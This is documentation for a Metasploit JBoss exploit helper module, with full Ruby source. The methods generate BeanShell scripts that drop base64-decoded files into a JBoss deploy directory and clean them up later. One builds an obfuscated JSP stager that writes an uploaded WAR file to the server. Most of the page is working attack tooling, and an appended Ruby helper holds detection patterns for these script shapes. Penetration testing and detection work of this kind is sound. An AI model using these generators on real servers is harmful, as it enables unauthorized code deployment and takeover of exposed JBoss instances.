Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts
- Included in: Msf::Exploit::Remote::HTTP::JBoss
- Defined in: lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb
Instance Method Summary
- #create_file_bsh(opts = {}) ⇒ String
  Generate a Bean Shell script which creates files inside JBoss’s deploy directory.
- #delete_files_bsh(opts = {}) ⇒ String
  Generate a Bean Shell script to delete files from JBoss’s /deploy directory.
- #generate_bsh(type, opts = {}) ⇒ String
  Generates a Bean Shell Script.
- #stager_jsp(app_base) ⇒ String
  Generate a stager JSP to write a WAR file to the deploy/ directory.
Instance Method Details
#create_file_bsh(opts = {}) ⇒ String
Generate a Bean Shell script which creates files inside JBoss’s deploy
directory.
```ruby
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 67

def create_file_bsh(opts = {})
  dir = opts[:dir]
  file = opts[:file]
  contents = opts[:contents]

  payload_bsh_script = <<-EOT
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "#{contents}";

BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/#{dir}").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + "/deploy/#{file}";
FileOutputStream fstream = new FileOutputStream(location);
fstream.write(byteval);
fstream.close();
  EOT

  payload_bsh_script
end
```
#delete_files_bsh(opts = {}) ⇒ String
Generate a Bean Shell script to delete files from JBoss’s /deploy
directory.
```ruby
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 97

def delete_files_bsh(opts = {})
  script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n"
  opts.values.each do |v|
    script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n"
  end

  script
end
```
#generate_bsh(type, opts = {}) ⇒ String
Generates a Bean Shell Script.
```ruby
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 10

def generate_bsh(type, opts ={})
  bean_shell = nil
  case type
  when :create
    bean_shell = create_file_bsh(opts)
  when :delete
    bean_shell = delete_files_bsh(opts)
  end

  bean_shell
end
```
#stager_jsp(app_base) ⇒ String
Generate a stager JSP to write a WAR file to the deploy/ directory. This is used to bypass the size limit for GET/HEAD requests.
```ruby
# File 'lib/msf/core/exploit/remote/http/jboss/bean_shell_scripts.rb', line 27

def stager_jsp(app_base)
  decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
  file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
  jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
  fos_var = Rex::Text.rand_text_alpha(8+rand(8))
  content_var = Rex::Text.rand_text_alpha(8+rand(8))

  stager_jsp = <<-EOT
<%@page import="java.io.*,
    java.util.*,
    sun.misc.BASE64Decoder"
%>
<%
String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
try {
String #{content_var} = "";
String parameterName = (String)(request.getParameterNames().nextElement());
#{content_var} = request.getParameter(parameterName);
FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
#{fos_var}.write(#{decoded_var});
#{fos_var}.close();
}
catch(Exception e){ }
%>
  EOT
  stager_jsp
end
```
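A detection-side counterpart to the generators documented above, as an added example that is not Metasploit code or part of the original page: a Ruby triage helper that flags text carrying the fixed Java API strings these scripts emit. The names `TRAITS`, `classify` and `scan_tree`, the verdict labels and the sample strings are hypothetical and constructed for illustration.

```ruby
# Added example (not Metasploit code): triage text for the script shapes
# documented on this page. The stager randomizes its variable names, so the
# rules key on the fixed Java API strings instead of identifiers.
TRAITS = {
  home_dir_lookup: /System\.getProperty\(\s*"jboss\.server\.home\.dir"\s*\)/,
  deploy_path:     %r{\+\s*"/deploy/},
  base64_decoder:  /sun\.misc\.BASE64Decoder|new\s+BASE64Decoder\s*\(/,
  file_write:      /new\s+FileOutputStream\s*\(/,
  first_param:     /request\.getParameterNames\(\)\.nextElement\(\)/,
  file_delete:     /new\s+File\([^)]*\)\.delete\(\)/
}.freeze

# Both anchors (home-dir lookup and a "/deploy/" path) must be present before
# any behaviour is named; this keeps ordinary upload JSPs out of the results.
def classify(text)
  hits = TRAITS.select { |_, re| text.match?(re) }.keys
  anchored = (%i[home_dir_lookup deploy_path] - hits).empty?
  return { verdict: :clean, traits: hits } unless anchored

  verdict =
    if hits.include?(:first_param) && hits.include?(:file_write) then :jsp_stager
    elsif hits.include?(:base64_decoder) && hits.include?(:file_write) then :bsh_file_drop
    elsif hits.include?(:file_delete) then :bsh_cleanup
    else :suspicious
    end
  { verdict: verdict, traits: hits }
end

# Walk a directory tree (for example a server's deploy/ or tmp/ directory)
# and return [path, verdict] pairs for every file that is not clean.
def scan_tree(root)
  Dir.glob(File.join(root, '**', '*')).select { |p| File.file?(p) }.filter_map do |path|
    result = classify(File.binread(path))
    [path, result[:verdict]] unless result[:verdict] == :clean
  end
end

# Constructed samples: a cleanup script in the documented shape and a benign JSP.
SAMPLE_CLEANUP = <<~BSH
  String jboss_home = System.getProperty("jboss.server.home.dir");
  new File(jboss_home + "/deploy/example.war").delete();
BSH
SAMPLE_BENIGN = <<~JSP
  <% FileOutputStream fos = new FileOutputStream(tmpDir + "/upload.bin"); %>
JSP

puts classify(SAMPLE_CLEANUP).inspect if __FILE__ == $PROGRAM_NAME
```

`classify` expects decoded text, so URL-encoded request data taken from access logs or packet captures has to be decoded before it is passed in.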